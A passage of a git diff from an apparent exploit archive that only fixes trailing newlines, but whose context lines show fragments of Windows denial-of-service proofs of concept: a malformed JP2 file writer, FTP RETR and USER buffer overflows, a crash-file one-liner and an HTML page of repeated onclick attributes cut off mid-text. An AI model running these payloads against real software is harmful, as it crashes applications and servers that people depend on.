f.write('\x00\x00\x00\x0C\x6A\x50\x20\x20\x0D\x0A\x87\x0A\x00\x00\x00\x14\x66\x74\x79\x70\x6A\x70\x32\x20\x00\x00\x00\x00\x6A\x70\x32\x20\x00\x00\x00\x2D\x6A\x70\x32\x68\x00\x00\x00\x16\x69\x68\x64\x72\x00\x00\x00\x0D\x00\x00\x00\x0B\x00\x03\x07\x07\x00\x00\x00\x00\x00\x0F\x63\x6F\x6C\x72\x01\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x6A\x70\x32\x63\xFF\x4F\xFF\x51\x00\x2F\x00\x00\x00\x00\x00\x0B\x00\x00\x00\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x00\x00\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x07\x01\x01\x07\x00\x00\x07\x01\x01\xFF\x5C\x00\x0D\x40\x40\x48\x48\x50\x48\x48\x50\x48\x48\x50\xFF\x52\x00\x0C\x00\x00\x00\x01\x01\x03\x04\x04\x00\x01\xFF\x64\x00\x0F\x00\x01\x4C\x57\x46\x5F\x4A\x50\x32\x5F\x32\x30\x37\xFF\x90\x00\x0A\x00\x00\x00\x00\x01\xD7\x00\x01\xFF\x93\xC7\xD4\x0A\x0B\xC7\x38\x51\x7F\xC3\xE7\x06\x05\x37\xD2\xC7\xD4\x0A\x03\x99\xA5\x4C\x37\xC1\xF3\x83\x8F\xB4\x16\x0F\xA8\x0C\x02\x3E\x7F\x0C\x36\xBB\x62\x2F\x0B\xCC\x17\xC0\x7C\x21\x40\x7C\x21\xC0\x7C\x80\x80\x04\x3F\x00\x8C\x5F\x08\x4B\xC1\xF3\x83\x87\xD4\x0B\x03\xE7\x06\x03\x86\x7F\x0C\x3F\x54\xA0\x7F\x08\xC3\x3F\xC7\xDA\x19\x0F\xA8\x26\x1F\x68\x50\x1D\x1C\x3D\xBB\xD4\xFC\x81\x39\x8F\xA6\x70\x69\x0D\x31\x7D\x53\xE7\xDB\x76\x1B\xBF\x0C\xAC\x1B\x93\x78\xD2\xF9\xD4\xA4\x4F\xC1\xF3\x8A\x81\xF2\x07\x80\xF9\x03\x80\x1C\x55\x34\xA2\x49\xD7\xFB\x27\x22\x0F\x01\xA7\xB1\x0A\x1F\x87\x4F\x04\x72\xC3\xEE\xE0\x5C\x7F\xC1\xF3\x8C\x87\xD4\x13\x07\xD4\x10\x11\x7B\xFC\x98\xB8\x1F\x71\x08\x68\xBE\x09\x3F\x0B\x4F\x2B\x89\x58\x56\x5E\xD9\xF3\x0C\xAC\x7A\x0E\x4B\x8C\xDA\x19\xC3\xEA\x1D\x87\xD4\x3D\x07\xD4\x30\x4F\x4D\xF3\xDD\x3B\x9E\x30\xC2\x67\xC8\xBE\x80\x42\x86\xA2\x9D\x6E\x6C\x29\x29\x2B\xDD\xF5\x71\x5E\xD4\x7D\xE4\x5F\x03\x8A\xAE\x0D\x74\xDA\xBA\xD1\x3F\xD2\x58\x2F\x8D\x45\x36\x7B\xF4\x45\xC1\x95\x14\xDB\x5D\x6E\x1C\x49\xC8\xC2\x72\xDF\x1E\xE9\x2F\x2C\xBC\xC7\xAA\x56\x9E\xA9\x73\xFD\xA7\xEB\xEB\x43\x78\x20\x08\x39\xEE\x07\xCE\x2B\xC1\xF3\x99\x83\xE7\x33\x03\xE7\x2E\x5F\xEC\x62\x95\x14\x7C\xE1\xB1\x36\x06\xEE\x8D\x1B\xB8\xD9\xFC\x4C\x12\x2D\x5F\xA2\xA1\x7C\x80\xFD\x3D\x57\x59\xB9\x1B\xCD\x48\x78\xB4\xC6\x7F\xC3\x73\x32\x8F\x6E\x38\x51\x45\xCD\xC7\xDA\xED\x54\x5B\x09\xC2\xC1\x85\xF6\x0B\x9C\xEF\x38\x79\x10\x72\x31\x80\x43\x0D\x75\x99\x95\x9C\xE6\x44\x7F\xC1\xF3\x9E\x87\xD4\x3D\x03\xE7\x2E\x11\x88\x13\x57\x4E\x51\x31\x2D\xBF\x76\xEC\x3E\x42\x3C\xF9\xA6\x5D\x7D\x96\x05\xF0\xA9\xA0\x9E\x69\x4C\xBF\x71\xA3\xBF\x03\x89\x78\x67\x57\xF0\xBB\xD2\x32\x12\x88\x9C\xD3\x41\xF6\x81\xED\x3E\x2E\x35\x62\xF1\x69\xDA\xC2\x71\x0F\xAB\x14\x1B\x16\x55\xAC\x51\x83\x1E\x48\x2E\x20\xC8\x39\x1A\x46\x12\xE1\x62\x07\x88\x8C\x43\x20\x1A\x1B\xFF\xD9') f.close() -print "Done, 1 file generated on 'C:\\' ..." - +print "Done, 1 file generated on 'C:\\' ..." \ No newline at end of file diff --git a/platforms/windows/dos/15860.py b/platforms/windows/dos/15860.py index d86fdaf1b..95474e9bc 100755 --- a/platforms/windows/dos/15860.py +++ b/platforms/windows/dos/15860.py @@ -35,4 +35,4 @@ data = s.recv(1024) print("[+] Sending second exploit stage...\n") s.send("RETR " + buffer + '\r\n') data = s.recv(1024) -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/dos/15897.py b/platforms/windows/dos/15897.py index a70455cfa..337910630 100755 --- a/platforms/windows/dos/15897.py +++ b/platforms/windows/dos/15897.py @@ -20,4 +20,4 @@ try: print " Vulnerable file created!..." print " Open the mid file with the application and Voila!! , it crashes!!\n" except: - print "[-] Error occured!" + print "[-] Error occured!" \ No newline at end of file diff --git a/platforms/windows/dos/15905.py b/platforms/windows/dos/15905.py index 3c97b4ce2..08811b23c 100755 --- a/platforms/windows/dos/15905.py +++ b/platforms/windows/dos/15905.py @@ -19,4 +19,4 @@ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,21)) print "Send USER " + buf -s.send("USER %s\r\n" % buf) +s.send("USER %s\r\n" % buf) \ No newline at end of file diff --git a/platforms/windows/dos/15925.txt b/platforms/windows/dos/15925.txt index f8d3bf7d1..464b498d6 100755 --- a/platforms/windows/dos/15925.txt +++ b/platforms/windows/dos/15925.txt @@ -11,4 +11,4 @@ #Create the PoC file: # perl -e 'print "B"x90000' > poc.txt -# Starts StageTracker -> Click on SET LOAD -> Open the poc.txt -> Click on PLAY -> StageTracker crashed… +# Starts StageTracker -> Click on SET LOAD -> Open the poc.txt -> Click on PLAY -> StageTracker crashed… \ No newline at end of file diff --git a/platforms/windows/dos/1593.c b/platforms/windows/dos/1593.c index e7caa293e..d20060582 100755 --- a/platforms/windows/dos/1593.c +++ b/platforms/windows/dos/1593.c @@ -99,4 +99,4 @@ int main(int argc, char **argv) printf("DoS Attack Done!\n"); } -// milw0rm.com [2006-03-19] +// milw0rm.com [2006-03-19] \ No newline at end of file diff --git a/platforms/windows/dos/15940.pl b/platforms/windows/dos/15940.pl index e4971c287..2fc8c6041 100755 --- a/platforms/windows/dos/15940.pl +++ b/platforms/windows/dos/15940.pl @@ -72,5 +72,4 @@ my $sock1 = new IO::Socket::INET (PeerAddr => $server, PeerPort => $port, Timeou print "[+] Sending malicious packet ...\n"; print $sock1 "$buf"; print "\n[x] Server crashed!\n"; -exit; - +exit; \ No newline at end of file diff --git a/platforms/windows/dos/15959.pl b/platforms/windows/dos/15959.pl index cdbe2afec..0b2c0c35c 100755 --- a/platforms/windows/dos/15959.pl +++ b/platforms/windows/dos/15959.pl @@ -100,4 +100,4 @@ print "\n\n[*] Creating $file file...\n"; open mxe, ">./$file" || die "\nCan't open $file: $!"; print mxe $format; print "\n[.] File successfully mounted!\n\n"; -close mxe; +close mxe; \ No newline at end of file diff --git a/platforms/windows/dos/1598.html b/platforms/windows/dos/1598.html index faf1f19fc..f2eb41cdc 100755 --- a/platforms/windows/dos/1598.html +++ b/platforms/windows/dos/1598.html @@ -1,3 +1,3 @@ <html><body><img src=http://lcamtuf.coredump.cx/photo/current/m2A.jpg><foo onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork onclick=bork 